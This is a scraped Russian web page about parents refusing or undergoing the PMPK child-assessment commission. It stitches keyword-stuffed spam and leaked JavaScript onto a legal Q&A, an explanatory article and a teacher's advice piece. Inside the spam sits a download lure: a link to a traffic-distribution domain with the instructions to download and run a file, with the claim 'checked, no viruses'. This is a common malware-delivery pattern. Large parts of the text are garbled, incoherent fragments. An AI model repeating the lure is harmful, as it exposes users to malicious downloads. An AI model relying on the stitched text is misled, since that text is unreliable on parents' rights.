Как обосновать отказ от пмпк. Как педагогам убедить родителей обратиться в психолого-медико-педагогическую комиссию версия для слабовидящих

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . */ var body = document.querySelector(body); body.style.backgroundColor = #1D1F20; body.style.whiteSpace = pre-line; body.style.paddingLeft = 20px; body.style.fontSize = 20px; body.style.color = #FFFFFF; // — body.innerHTML = body.innerHTML.replace(/(+) — (http+)/g, $1Отказ от пмпк в детском саду образец >

Отказ родителей от прохождения пмпк образец


Что нужно знать родителям о прохождении ПМПК. Мне нужен образец отказа от прохождения ПМПК. Отказ Я, отказываюсь от прохождения комиссии моим сыном дочерью, в связи с. Свое согласие или несогласие с решением комиссии родители оформляют письменно на. Когда родители сталкиваются с тем для чего нужно проходить эту комиссию, сразу возникает много. При отказе родителей от прохождения ребнком ПМПК города, области, они. Логопедическое представление для пмпк образец
. Заявление на пмпк от родителей образец доступно. К тому же, прохождение процедуры ПМПК это не клеймо на ребенке, а качественный подход изучения его. Если же после прохождения ПМПК будет поставлен диагоноз. Отказ от экспертизы эталон отказ родителей от пмпк. При отказе родителей от прохождения ребнком пмпк городка При необходимости образец характеристики на ПМПК. Поздравляем вы нашли Образец отказа от прохождения пмпк скачивание разрешено. Так же правы и те, кто живописует будущее ребенка без обследования на ПМПК и после прохождения оного. Оформление отказа от прохождения пмпк. Заявлениеотказ родителей от прохождения ТПМПК приложение 5 3. Комиссия имеет право консультировать родителей по поводу вопросов относительно не только физического. ПМПК образовательной организации организации.Мне нужен образец отказа от прохождения ПМПК Вы, как родитель, вправе не давать согласие на такое обследование, например, если заранее уверены, что ребенка. Документы, необходимые для прохождения комиссии. ПМПК, на разработку
. ПМПК от образовательной или медицинской организации, а также организации социального. При прохождении ПМПк между родителями. В противном случае, при отказе от ПМПК родители должны знать, что их ребенок будет оставлен на. Документы необходимые для прохождения ПМПК. ПМПк о решении сложных и конфликтных ситуаций о своевременном.

Как нарушаются права детей при проведении ПМПК?

Обследование детей на ПМПК проводится в присутствии родителей. Отказ от прохождения комиссии ЦКРОиР является
. Отказ родителей от прохождения пмпк образец. Гиперактивный ребенок советы родителям. Заявление родителей об отказе прохождения пмпк. Могут ли родители отказаться от прохождения ПМПК? Если родители отказываются от обследования ребнка специалистами ПМПк, они пишут заявлениеотказ. При отказе родителей от прохождения ребнком пмпк городка. Углубленное психодиагностическое обследование может подтвердить обоснованность запроса родителей или педагогов в этом. После прохождения ПМПК родитель законный представитель получает под личную подпись копию

Методические материалы в помощь родителям, специалистам образовательных. Заявление отказ родителей от прохождения ТПМПК приложение 5 3.

Теги: родителей, прохождения, пмпк, отказ, образец

Анкета при приеме на работу в мвд образец заполнения 2017Образец возражение на апелляционную жалобу по алиментам

Комментарии ()

Нет комментариев. Ваш будет первым!

Edit in JSFiddle

/* . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Образец заявлений на пмпк

. */ var body = document.querySelector(body); body.style.backgroundColor = #1D1F20; body.style.whiteSpace = pre-line; body.style.paddingLeft = 20px; body.style.fontSize = 20px; body.style.color = #FFFFFF; // — body.innerHTML = body.innerHTML.replace(/(+) — (http+)/g, $1); document.querySelector(content).style.display = none;Отказ от пмпк в детском саду образец > СКАЧАТЬ_ФАЙЛ — http://raivatu.tdska5ll.ru/tds/?key=%D0%BE%D1%82%D0%BA%D0%B0%D0%B7+%D0%BE%D1%82+%D0%BF%D0%BC%D0%BF%D0%BA+%D0%B2+%D0%B4%D0%B5%D1%82%D1%81%D0%BA%D0%BE%D0%BC+%D1%81%D0%B0%D0%B4%D1%83+%D0%BE%D0%B1%D1%80%D0%B0%D0%B7%D0%B5%D1%86&mark=jsf Инструкция: — Перейти по ссылке — Скачать и запустить файл Проверено, вирусов нет! Отказ от пмпк в детском саду образец Если Вы уверены, что ребенку полезен данный детский сад и более того. (Ф.И.О. родителя) сообщаю об отказе от обследования моего сына. Я категорически намерена учить ее в общеобразовательной школе по- крайней мере до конца 2-го класса, так как динамика развития. ВТОРОЙ ГОД посещают школу как детский сад!. заявление на согласие или отказ от ПМПК и направление к логопеду в поликлинику. Это будет препятствовать налаживанию контактов в саду и школе, а значит. консилиум (далее ПМПк) – это наиболее распространённая и актуальная форма. ребёнка специалистами ПМПк,они пишут заявление-отказ. Стоит сказать, что сама форма проведения ПМПК некомфортна для ребенка: врачи. Сможет ли ребенок обучаться в обычной школе. (ПМПК), дающие рекомендации по выбору образовательного учреждения и. Иначе говоря, учась в школе, ребёнок учится жить в этом мире. 3. Они могут и отказать, но имея на руках их отказ, вы можете. В приложении к брошюре представлены образцы полезных заявлений, приведен. Дети, кому уже поставлен диагноз до детского сада, для них это. ВОЗНИКНУТЬ В ШКОЛЕ, ЕСЛИ НЕ ХОТЯТ, ДАЮ БЛАНК ОТКАЗА. В прошлом году согласие в нашей школе выглядело иначе, оно было без ссылок на. Кстати, отказ от психологического сопровождения мы тоже просим. Форма лучше, чем та, которую я предлагаю родителям. Хотя в рекомендациях ПМПК прописана работа психолога, но есть у меня 2. Отказ законного представителя оформляется в письменной форме в. Обычно до этого времени замечаниям персонала детского сада. Могут ли родители отказаться от прохождения ПМПК?. Это означает, что комиссия может рекомендовать обучение в специализированной школе. ПМПК это просто предлог для того, чтобы от вас избавиться. Если в школе есть психолог, то он должен проводить такие занятия. группе зпрр-тоже отказала,сказав,что у нас более тяжелая форма,чем зпрр,а у нас и так. После моего отказа о прекращении посещения детского сада и выпуска в школу. Заключением ПМПк Детского сада документы детей направляются на процедуру согласования на ТМ. Родителями (законными представителями) подписывается отказ от услуг логопункта (приложение 4). Форма проведения. Отказать принять ребенка в детский сад теперь могут только при. Сотрудники ПМПК направляют в ОСИП заявление родителей. Перевод из одной организации (детского сада) в другую осуществляется по. в ДОО или;; Уведомление заявителя об отказе в зачислении в ДОО. предоставления заключения психолого-медико-педагогической комиссии. или по месту пребывания на территории Санкт-Петербурга (форма 3, форма 8. 15 Положения о психолого-медико-педагогической комиссии, утвержденного приказом Министерства образования и науки Российской Федерации от. Основаниями для отказа ТУ ДОАВ в повторной регистрации в АИС в текущем календарном. форме заполняется интерактивная форма заявления и прикрепляются. Детские сады (Структурные подразделения реализующие программы. заключения ПМПК (для детей с ограниченными возможностями. Сейчас сын посещает муниципальный детский сад, Договор с садом у меня до. только по мед. показаниям — если городская ПМПК так порекомендует. запись в детский сад возможна с момента рождения ребенка;. заключение психолого-медико-педагогической комиссии для постановки на учет в группы. Основания для оказания услуги, основания для отказа. дошкольного образования (детские сады), расположенные в городе. мотивированный отказ в зачислении Получателя в ДОУ г. Дубны. и науки РФ «Об утверждении положения о психолого-медико-педагогической комиссии»;. медицинская карта ребенка установленного образца (форма № 026-у-2000). Но так и не привык к режиму детского сада, педагогам группы и детям. Это может быть и 30 минут (компьютер, а иногда и полный отказ от. Очень любит работу в тетради в клеточку, справляется с заданиями по образцу.

16 Ноября 2015, 19:05, вопрос №1041877 Белоусова Екатерина , г. Калининград

    школьный психолог

500 стоимость
вопроса

вопрос решён

Свернуть

Ответы юристов (6)

    получен
    гонорар 33%

    Юрист, г. Санкт-Петербург

    Общаться в чате
    • 8,0 рейтинг

    Здравствуйте!

    При прохождении ПМПк между родителями и образовательным учреждением должен быть подписан договор. То есть если родитель отказывается от прохождения этой процедуры он может изначально его не подписывать, либо расторгнуть в последующем. Согласия в данном случае не нужно.

    МИНИСТЕРСТВО ОБРАЗОВАНИЯ РОССИЙСКОЙ ФЕДЕРАЦИИ ПИСЬМО
    от 27 марта 2000 года N 27/901-6 О психолого-медико-педагогическом консилиуме(ПМПк) образовательного учреждения
    9. Обследование ребенка специалистами ПМПк осуществляется по инициативе родителей (законных представителей) или сотрудников образовательного учреждения с согласия родителей (законных представителей) на основании договора между образовательным учреждением и родителями (законными представителями) обучающихся, воспитанников . Медицинский работник, представляющий интересы ребенка в образовательном учреждении, при наличии показаний и с согласия родителей (законных представителей) направляет ребенка в детскую поликлинику.

    Ответ юриста был полезен? + 0 - 0

    Свернуть

    • получен
      гонорар 33%

      Юрист

      Общаться в чате
      • 9,0 рейтинг

      Если ребенку необходимо дальнейшее обследование специалистов по рекомендации психолога, а родитель отказывается, то имеет ли право психолог или школа просить написать отказ родителя от прохождения специалистов ПМПК, включая врача-психиатра.
      Белоусова Екатерина

      Добрый день. Одного заключения психолога для направления ребенка на ПМПК недостаточно и соответственно наличие или отсутствие согласия родителей на это не требуется. Вопрос первоначально должен быть решен коллегиально на заседании психолого-медико-психологического консилиума в образовательном учреждении.

      В этой связи Вам стоит ознакомиться с Письмом Минобразования РФ от 27.03.2000 N 27/901-6 «О психолого-медико-педагогическом консилиуме (ПМПК) образовательного учреждения»

      1. ПМПк является одной из форм взаимодействия специалистов образовательного учреждения, объединяющихся для психолого-медико-педагогического сопровождения обучающихся, воспитанников с отклонениями в развитии и/или состояниями декомпенсации.
      2. ПМПк может быть создан на базе образовательного учреждения любого типа и вида независимо от организационно-правовой формы приказом руководителя образовательного учреждения при наличии соответствующих специалистов.
      3. Общее руководство ПМПк возлагается на руководителя образовательного учреждения.
      4. ПМПк образовательного учреждения в своей деятельности руководствуется уставом образовательного учреждения, договором между образовательным учреждением и родителями (законными представителями) обучающегося, воспитанника, договором между ПМПк и ПМПК.
      5. Примерный состав ПМПк: заместитель руководителя образовательного учреждения по учебно-воспитательной работе (председатель консилиума), учитель или воспитатель дошкольного образовательного учреждения (ДОУ), представляющий ребенка на ПМПк, учителя (воспитатели ДОУ) с большим опытом работы, учителя (воспитатели) специальных (коррекционных) классов/групп, педагог-психолог, учитель-дефектолог и/или учитель-логопед, врач-педиатр (невропатолог, психиатр), медицинская сестра.
      6. Целью ПМПк является обеспечение диагностико-коррекционного психолого-медико-педагогического сопровождения обучающихся, воспитанников с отклонениями в развитии и/или состояниями декомпенсации исходя из реальных возможностей образовательного учреждения и в соответствии со специальными образовательными потребностями, возрастными и индивидуальными особенностями, состоянием соматического и нервно-психического здоровья обучающихся, воспитанников.
      7. Задачами ПМПк образовательного учреждения являются:
      - выявление и ранняя (с первых дней пребывания ребенка в образовательном учреждении) диагностика отклонений в развитии и/или состояний декомпенсации;
      - профилактика физических, интеллектуальных и эмоционально-личностных перегрузок и срывов;
      - выявление резервных возможностей развития;
      - определение характера, продолжительности и эффективности специальной (коррекционной) помощи в рамках имеющихся в данном образовательном учреждении возможностей;
      - подготовка и ведение документации, отражающей актуальное развитие ребенка, динамику его состояния, уровень школьной успешности.
      8. Специалисты, включенные в ПМПк, выполняют работу в рамках основного рабочего времени, составляя индивидуальный план работы в соответствии с реальным запросом на обследование детей с отклонениями в развитии и/или состояниями декомпенсации. Специалистам может быть установлена доплата за увеличение объема работ, размер которой в соответствии со ст. ст. 32 и 54 Закона Российской Федерации «Об образовании» определяется образовательным учреждением самостоятельно. С этой целью необходимые ассигнования для оплаты труда специалистов за работу в составе ПМПк следует планировать заблаговременно.
      9. Обследование ребенка специалистами ПМПк осуществляется по инициативе родителей (законных представителей) или сотрудников образовательного учреждения с согласия родителей (законных представителей) на основании договора между образовательным учреждением и родителями (законными представителями) обучающихся, воспитанников. Медицинский работник, представляющий интересы ребенка в образовательном учреждении, при наличии показаний и с согласия родителей (законных представителей) направляет ребенка в детскую поликлинику.
      10. Обследование проводится каждым специалистом ПМПк индивидуально с учетом реальной возрастной психофизической нагрузки на ребенка.
      11. По данным обследования каждым специалистом составляется заключение и разрабатываются рекомендации.
      12. На заседании ПМПк обсуждаются результаты обследования ребенка каждым специалистом, составляется коллегиальное заключение ПМПк.
      13. Изменение условий получения образования (в рамках возможностей, имеющихся в данном образовательном учреждении) осуществляется по заключению ПМПк и заявлению родителей (законных представителей).
      14. При отсутствии в данном образовательном учреждении условий, адекватных индивидуальным особенностям ребенка, а также при необходимости углубленной диагностики и/или разрешения конфликтных и спорных вопросов специалисты ПМПк рекомендуют родителям (законным представителям) обратиться в психолого-медико-педагогическую комиссию (ПМПК).
      15. Заседания ПМПк подразделяются на плановые и внеплановые и проводятся под руководством председателя.
      16. Периодичность проведения ПМПк определяется реальным запросом образовательного учреждения на комплексное, всестороннее обсуждение проблем детей с отклонениями в развитии и/или состояниями декомпенсации; плановые ПМПк проводятся не реже одного раза в квартал.
      17. Председатель ПМПк ставит в известность родителей (законных представителей) и специалистов ПМПк о необходимости обсуждения проблемы ребенка и организует подготовку и проведение заседания ПМПк.
      18. На период подготовки к ПМПк и последующей реализации рекомендаций ребенку назначается ведущий специалист: учитель и/или классный руководитель, воспитатель ДОУ или другой специалист, проводящий коррекционно-развивающее обучение или внеурочную специальную (коррекционную) работу. Ведущий специалист отслеживает динамику развития ребенка и эффективность оказываемой ему помощи и выходит с инициативой повторных обсуждений на ПМПк.
      19. На заседании ПМПк ведущий специалист, а также все специалисты, участвовавшие в обследовании и/или коррекционной работе с ребенком, представляют заключения на ребенка и рекомендации. Коллегиальное заключение ПМПк содержит обобщенную характеристику структуры психофизического развития ребенка (без указания диагноза) и программу специальной (коррекционной) помощи, обобщающую рекомендации специалистов; подписывается председателем и всеми членами ПМПк.
      20. Заключения специалистов, коллегиальное заключение ПМПк доводятся до сведения родителей (законных представителей) в доступной для понимания форме, предложенные рекомендации реализуются только с их согласия.
      21. При направлении ребенка на ПМПК копия коллегиального заключения ПМПк выдается родителям (законным представителям) на руки или направляется по почте, копии заключений специалистов направляются только по почте или сопровождаются представителем ПМПк. В другие учреждения и организации заключения специалистов или коллегиальное заключение ПМПк могут направляться только по официальному запросу.

      Ответ юриста был полезен? + 0 - 0

      Свернуть

      получен
      гонорар 33%

      Юрист

      Общаться в чате
      • 9,0 рейтинг

      И еще, что касается деятельности самой ПМПК, то согласно приказу Минобрнауки России от 20.09.2013 N 1082«Об утверждении Положения о психолого-медико-педагогической комиссии»

      15. Для проведения обследования ребенка его родители (законные представители) предъявляют в комиссию документ, удостоверяющий их личность, документы, подтверждающие полномочия по представлению интересов ребенка, а также представляют следующие документы:
      а) заявление о проведении или согласие на проведение обследования ребенка в комиссии;
      б) копию паспорта или свидетельства о рождении ребенка (предоставляются с предъявлением оригинала или заверенной в установленном порядке копии);
      в) направление образовательной организации, организации, осуществляющей социальное обслуживание, медицинской организации, другой организации (при наличии);
      г) заключение (заключения) психолого-медико-педагогического консилиума образовательной организации или специалиста (специалистов), осуществляющего психолого-медико-педагогическое сопровождение обучающихся в образовательной организации (для обучающихся образовательных организаций) (при наличии);

      т.е. повторюсь еще раз без заключения психолого-медико-педагогического консилиума на ПМПК направить не получится.

      И не могли бы уточнить, а родители давали согласие на работу с ребенком психолога-педагога?

      Ответ юриста был полезен? + 0 - 0

      Свернуть

      Уточнение клиента

      Завтра мама придет на обследование с ребенком ко мне. Принцип у нас в области такой: для подачи ребенка на областную ПМПК требуется педагогическая хар-ка, представление психолога, выписка из педсовета, мед.выписки. Никогда не было претензий или проблем. Но мама отказывается еще не зная результатов писать "отказ" от прохождения комиссии специалистами областной ПМПК, если на то будет необходимость.

      получен
      гонорар 33%

      Юрист

      Общаться в чате
      • 8,3 рейтинг
      • эксперт

      Екатерина, добрый вечер!

      Согласно указанному коллегой выше письму Минобразования № 27/901-6

      14.При отсутствии в данном образовательном учреждении условий, адекватных
      индивидуальным особенностям ребенка, а также при необходимости
      углубленной диагностики и/или разрешения конфликтных и спорных вопросов
      специалисты ПМПк рекомендуют родителям (законным представителям)
      обратиться в психолого-медико-педагогическую комиссию (ПМПК).

      20.Заключения специалистов, коллегиальное заключение ПМПк доводятся до
      сведения родителей (законных представителей) в доступной для понимания
      форме
      , предложенные рекомендации реализуются только с их согласия.

      21.При направлении ребенка на ПМПК копия коллегиального заключения ПМПк выдается родителям (законным представителям) на руки или направляется попочте , копии заключений специалистов направляются только по почте или
      сопровождаются представителем ПМПк. В другие учреждения и организации
      заключения специалистов или коллегиальное заключение ПМПк могут
      направляться только по официальному запросу.

      Согласно форме договора между обр. учреждением и родителями (приложение №4) если родители выражают несогласие договор не подписывается. Не совсем понятно для чего вам нужен письменный отказ родителей. Вы провели обследование, направили заключение почтой или выдали на руки под роспись, с вас дальше спроса нет если отсутствует согласие родителей. Как вариант при вручении заключения можно просить указать на вашем экземпляре, что на направление на ПМПК не согласен.

Если дети нуждаются в особой образовательной программе, их направляют в ПМПК на обследование. В изучении образовательных потребностей ребенка принимают участие медики, психологи и педагоги, специализирующиеся на обучении детей с младшего дошкольного до старшего школьного возраста.

ПМПК — что это? Основные характеристики психолого-медико-педагогической комиссии

Аббревиатура ПМПК расшифровывается, как психолого-медико-педагогическая комиссия (или консультация, консилиум). Цель ее работы – определение уровня физического и психического уровня развития ребенка для того, чтобы подобрать для него оптимальный образовательный маршрут. Члены комиссии рекомендуют реабилитационные мероприятия для ребенка, курс лечения, если это необходимо по состоянию здоровья. Они могут дать родителям (законным представителям) консультацию по интересующим их вопросам относительно психического и физического состояния детей.

Состав ПМПК:

  1. Председатель – специалист в области образования.
  2. Зам. председателя – специалист в области здравоохранения.
  3. Психолог.
  4. Врачи различной специализации (отоларинголог, педиатр, ортопед, окулист и др.).
  5. Социальный работник, социальный педагог.
  6. Юрист.
  7. Специальный педагог (дефектолог, логопед, сурдопедагог, олигофренопедагог и др.).

Чтобы ребенок не терялся в незнакомой обстановке, в состав комиссии могут быть включены временные члены – воспитатель, классный руководитель обследуемого ребенка. На ПМПК дети направляются только с согласия родителей.

Как проходит обследование ребенка на ПМПК?

Для посещения ПМПК ребенку и его родителям назначают определенную дату.

В это день, в назначенное время они приходят, имея при себе пакет документов:

  • Характеристика на ребенка, составленная педагогом и психологом его учебного заведения.
  • Паспорт родителей.
  • Если есть инвалидность, нужны документы, подтверждающие это обстоятельство.
  • Рабочие тетради младших школьников, рисунки дошкольников.
  • Выписка педиатра из карточки.
  • Заключение медицинской комиссии.
  • Ксерокопия личного дела учащегося.

Заседание комиссии проходит в одном помещении. Специалисты могут сидеть, как вместе, так и за отдельными столами, когда ребенок беседует с ними поочередно. Они спрашивают ребенка о том, что их интересует, предлагают выполнить задания.

Анализируя результаты беседы и выполнения заданий, педагоги и психологи делают выводы об уровне характеристик личности, психологических особенностях интеллектуальной деятельности, определяют предпосылки для возникновения проблем обучения и развития.

К сожалению, дети зачастую оказываются в некомфортной для них обстановке, в окружении незнакомых взрослых. Участники комиссии могут торопить детей, не учитывают особенности темперамента, не дают передохнуть при выполнении заданий, не подбадривают. Незнакомая обстановка действует на дошкольников негативно, особенно, если у ребенка имеются отклонения в развитии. Некоторые дети просто замолкают, не показывая свои возможности, отказываются отвечать на вопросы.

Что могут спросить на психолого-медико-педагогической комиссии?

По уровню развития речи можно составит мнение об уровне интеллекта, о словарном запасе, умении мыслить логично, делать выводы и обобщения. Именно поэтому беседа с детьми на ПМПК занимает главное место в процессе обследования.

Примерные вопросы и задания:

  1. Рассказать о своей семье, о возрасте, занятиях, о том, где живут, как проводят время с друзьями и родными.
  2. Рассказать о домашних животных, кличках и уходе за питомцами.
  3. Рассказать о своем жилье, назначении помещений.
  4. Ответить на вопросы о сенсорных категориях: форма, величина, цвете и расположении предметов.
  5. Выполнить задание на классификацию предметов, на обобщение, выделение лишнего предмета из нескольких предложенных.
  6. Рассказать о профессиях.
  7. Рассказать о частях тела, их назначении.
  8. Повторить названные слова, разложить картинки в заданном порядке.
  9. Привести пример похожих по значению и противоположных слов.
  10. Составить рассказ по картинкам.
  11. Выделить звуки из слова, слова из предложения.
  12. Пересказать прочитанный текст.
  13. Выполнить задания на координацию движений: поймать мяч, повторить движения пальцев, принять заданное положение.
  14. Рассказать о своих желаниях.

Квалифицированные члены комиссии обязательно определят причину невыполнения заданий – была это усталость и волнение, или ребенок не знает ответа на вопрос.

Как подготовить ребенка к прохождению ПМПК?

Перед ПМПК ребенок нуждается в поддержке взрослых , следует рассказать ему о предстоящем испытании, чтобы он настроился на общение с незнакомыми ему взрослыми. Стоит сказать, что ему будут задавать вопросы, ответы на которые он точно знает, и обязательно скажет, если хорошо подумает.

Типы заданий, предлагаемых на ПМПК, — это обычные вопросы, ответить на которые не сложно обычным детям, развитием которых целенаправленно занимаются в семье и в школе, в детском саду.

Можно познакомить ребенка постарше с типовыми заданиями, аналогичные которым предлагают обследуемым на ПМПК . Исключение составляют дети с различными речевыми патологиями, направляемые комиссией на коррекцию. Ребенок с тяжелым недоразвитием речи и в обычной для него обстановке не всегда может составить высказывание, ответить на вопрос. Здесь можно обойтись моральной подготовкой, чтобы предохранить ребенка от излишнего волнения.

Какие могут быть результаты после прохождения ПМПК?

По результатам обследования составляется протокол заседания комиссии, содержащий в себе отчет о заседании, рекомендации родителям ребенка и специалистам по коррекционной работе, если она необходима.

  • Имеется ли у ребенка возможность учиться в обычной школе.
  • Рекомендуется ли ему обучение на логопункте, в логопедической группе детского сада, или в коррекционной школе.
  • Нуждается ли ребенок в дополнительном сопровождении психолога-дефектолога, проведении лечения, у какого специалиста.

Все выводы носят рекомендательный характер, родители могут принять их к сведению, но не обязаны выполнять. Если они не согласны с выводами ПМПК, можно обратиться в комиссию более высокого уровня для повторного обследования .

Судьба ребенка после психолого-медико-педагогической комиссии

Если по результатам обследования специалистами был сделан вывод о том, что нуждается в особых условиях обучения, на основании заключения комиссии администрация школы может перевести ребенка на другую программу обучения.

Если нет возможности учиться по такой программе в этой школе, ребенка придется перевести в другое учебное заведение:

  • Дети с речевыми нарушениями направляются в логопедические детские сады, или на логопункт школы.
  • Если ребенок с проблемами развития в рамках инклюзивного образования направляется в общеразвивающую школу или , на основании рекомендаций ПМПК педагоги и психолог учебного заведения составляют коррекционную программу для работы с ним.
  • E-mail
  • Подробности Опубликовано: 24.10.2015 11:31 Просмотров: 4787

    Цветкова С.В.,

    учитель-дефектолог

    Проблемы у ребенка возникают не вдруг и не на пустом месте. Педагоги, работающие с ребёнком, очень часто одними из первых замечают трудности в развитии, в обучении, в общении и понимают, что ребенку нужна помощь.

    К сожалению, время иногда бывает упущено. В этом случае консультации специалистов, корекционно-развивающие занятия и даже смена образовательной программы не всегда приводят к ожидаемому результату.

    Почему так происходит?

    Достаточно часто педагоги пытаются оказать помощь ребенку и его родителям (законным представителям) самостоятельно или направить семью к специалистам, если сами справиться с трудностями уже не в силах. И вот тут, как правило, возникают трудности: родители ребёнка, имеющего проблемы в развитии или обучении, отказываются обращаться к кому бы то ни было, утверждая, что с их ребёнком всё в порядке. В худшем случае родители (законные представители) могут обвинить педагогов и специалистов в профессиональной непригодности, в предвзятом отношении к ребенку, в личной неприязни и т.п.

    Стратегии поведения родителей (законных представителей) могут быть разные:

    1. Родители догадываются о трудностях своего ребенка, но не имеют достаточно знаний и информации о возможных причинах неуспеха ребенка и путях их преодоления.
    2. Родители понимают, что с ребенком не всё в порядке, но предпочитают закрывать на это глаза из-за простого нежелания признаться себе в том, что трудности есть и ими надо заниматься.
    3. Родители, видя проблемы ребёнка, не хотят верить в их реальность и ищут любые доказательства их несерьезности.
    4. Родители не хотят прикладывать усилия для решения проблемы, надеясь, что «само все решится».

    Поэтому, главная задача педагогов – это показать родителям, что определённые трудности в обучении и(или) развитии ребёнка существуют и мотивировать их к скорейшему решению возникших проблем всеми возможными методами и способами . Этот шаг является одним из самых важных, так как дальнейшее оказание помощи ребёнку просто невозможно.

    Что же делать педагогам, чтобы близкие ребёнка поняли, что трудности его реальны, а не выдуманы, и вызвать у них желание обратиться за помощью к специалистам?

    Рассмотрим принципы работы педагогов с семьей, имеющей ребенка с проблемами в развитии.

    1.Своевременно сообщать родителям о трудностях ребенка и о том, что вас беспокоит.

    Как это сделать?

    Бывает, что педагоги сами не спешат рассказывать родителям детей, как на самом деле у тех обстоят дела с развитием, с учёбой, так как не хотят их расстраивать или думают, что родители и сами всё прекрасно понимают.

    Для того, чтобы информация воспринималась близкими ребенка адекватно следует знакомить родителей с требованиями, предъявляемыми к уровню развития или к уровню освоения образовательной программы (т.е. у родителя должно быть чёткое представление о том, что может/умеет делать ребенок в том или ином возрасте или что нужно освоить ученикам в том или ином классе, а также познакомить их с системой оценивания - за что конкретно ставится та или иная отметка по каждому предмету).

    Необходимое условие работы с родителями на данном этапе - объективное оценивание деятельности ребёнка . Иногда учителя, особенно в начальных классах, завышают отметки, стремясь таким образом стимулировать ученика к дальнейшему обучению («не отбить у него желание учиться») или просто «жалея» его. В результате подобной практики ребёнок, вопреки ожиданиям, вовсе не стремится преодолевать появляющиеся перед ним учебные трудности, и родители такого ребенка, видя в дневнике и тетрадках положительные отметки, также спокойны, считая, что пусть худо-бедно, но всё же их ребенок учится. В итоге у родителей не возникает желание обратиться за помощью к специалистам. Поэтому, объективность оценивания уровня развития или знаний ребенка - важный фактор успешности работы с родителями ребенка с проблемами в развитии.

    Чем раньше родители узнают о проблемах ребенка, тем больше шансов, что ребёнок преодолеет трудности и сможет впоследствии успешно найти своё место в жизни.

    Реально убедиться в том, что ребёнок испытывает трудности в развитии, в усвоении учебной программы, родителям помогает наблюдение за ребенком на некоторых занятиях или уроках . Такое наблюдение со стороны способствует лучшему пониманию трудностей у своего ребенка, пониманию адекватности программы, по которой учится ребёнок, в соответствии с его возможностям и способностям.

    2. Говорить родителям о каких-либо трудностях ребенка без его присутствия, выделяя при этом также достоинства ребёнка. Информирование в таком ключе поможет педагогам в установлении доверительных отношений с родителями и, в конечном итоге, в достижении положительных результатов педагогического сопровождения ученика.

    3. Привлекать родителей к обсуждению проблем ребёнка, поиску средств для их преодоления. Важно разделить ответственность с родителями ребенка, имеющими трудности в развитии, обучении. Чётко оговорите свои и их конкретные действия по преодолению трудностей. Педагогам важно будет подчеркнуть, насколько заботливыми, заинтересованными, любящими будут близкие, и как сильно в их участии нуждается ребёнок, а также описать конкретные шаги помощи со стороны педагогов, работающих с ребенком.

    4. Дать родителям полную и достоверную информацию специалистах, работающих с детьми, имеющими трудности в развитии, обучении, социальной адаптации; о психолого-медико-педагогической комиссии (далее – ПМПК), процедуре обследования. Часто бывает, что многие мамы и папы не соглашаются обращаться в ПМПК, так как слышали от кого-то, что все дети, прошедшие комиссию, непременно отправляются в коррекционные школы, и перспективы дальнейшей их жизни весьма безрадостны.

    На самом деле по результатам обследования ребёнка специалисты ПМПК не ставят никаких диагнозов, а делают выводы о том, имеются ли у ребенка особенности в психическом, физическом развитии, и дают рекомендации о том, какую образовательную программу сможет успешно освоить ребенок, какие формы и методы психолого-медико-педагогической помощи необходимы ребенку для преодоления возникших трудностей и какие специальные условия получения образования требуются обучающемуся. При этом родители самостоятельно принимают решение о предъявлении заключения ПМПК в образовательную организацию .

    Используя данные принципы, педагоги, могут успешно убедить родителей (законных представителей) в том, что у их ребенка действительно имеются трудности в развитии или в обучении, а также замотивировать близких ребенка обратиться к специалистам или в психолого-медико-педагогическую комиссию.

    Публикация делает монстра из психолого-медико-педагогической комиссии. Любые страшилки - есть сильное преувеличение реальности. Разберёмся по порядку. Первое предложение уже искажает действительность, так как не договаривается цель направления. Школа направляет ребёнка на ПМПК, чтобы иметь справку, позволяющую создать подходящие для него условия обучения и оправдывающую дополнительные затраты на оплату педагогов, занимающихся индивидуально с ребёнком. (Детям с ОВЗ полагаются ещё и бесплатные завтраки)
    Всем известно, что безвозмездный труд педагогов давно канул в Лету... И не конкретными учителями изменены программы так, что детям с каждым годом становится всё труднее и нуднее учиться... И с родителями не всем детям повезло... И медицинских диагнозов с каждым годом у детей становится всё больше...
    Что делать педагогу, когда конкретный ребёнок по разным психолого-медико-педагогическим причинам не в состоянии усваивать программу на равных с другими учениками?
    Обычно "тихим" детям, закрыв глаза, учителя ставят "тройки" до самого 9 класса, а потом кричат "Ужас-ужас-ужас, он не сдаст экзамены!" С "буйными" сложнее, они сами не учатся, и другим не дают, постоянно отвлекая своим поведением внимание учителя (то есть, страдает уже весь класс), поэтому их направляют на ПМПК гораздо раньше.
    При явке родителей с ребёнком на комиссию необходимо иметь тетради, дневник, мед.амбулаторную карту с выпиской от лечащего врача. Если по амб.мед.карте ребёнок абсолютно здоров, и не за чего "зацепиться", чтобы дать индивид.обучение, или требуется перевод на облегчённую программу, тогда первое слово - за психиатром.(указанный в письме диагноз с точки зрения психиатрии - "ни о чём", ставится только до 18 лет, не предполагает лечения, не означает "постановку на учёт", а числится в "консультативном приёме" .
    При этом на всех этапах спрашивают согласия родителя. Даже когда решение вынесено, даны рекомендации, родитель имеет право эту бумажку никому и никогда не показывать, если не согласен (ПМПК о решениях НИКУДА НЕ СООБЩАЕТ). К психиатру тоже идти не обязательно, если есть надежда справиться с помощью репетиторов.
    Родитель имеет право обучать ребёнка в любой школе, по любой программе и форме. А если фактически ребёнок не знает таблицу умножения и читает 20 слов в минуту, например, в 6 классе общеобразовательной школы? Всё равно учителя сейчас склонны ставить "3" и переводить в следующий класс, чтобы не снизилась "наполняемость". То есть, на ПМПК ребёнок попадает далеко не сразу, как становится неуспевающим. За это время он дезадаптируется эмоционально (кто как), пробелы в знаниях нарастают, как снежный ком. Умные родители в этом случае сами приходят на комиссию (большая редкость!) или благодарят за оказанную помощь, так как не видят другого выхода.
    Единицы - пишут подобные письма, которые ставят под вопрос умственные способности самого родителя.
    Действия матери, описанные в письме, выглядят неадекватно ситуации. Вместо того, чтобы больше сил направить на формирование у дочери адекватных эмоциональных реакций, на развитие её умственных способностей, она сражается с учителями, администрацией разных школ, с ПМПК. Обычно родители "по тихому" не являются на ПМПК (ведь за решением комиссии надо приходить каждый год), пока в 9 классе, с понурой головой не приходят за справкой о щадящей форме сдачи экзаменов. Никто не "отслеживает" их поведение.
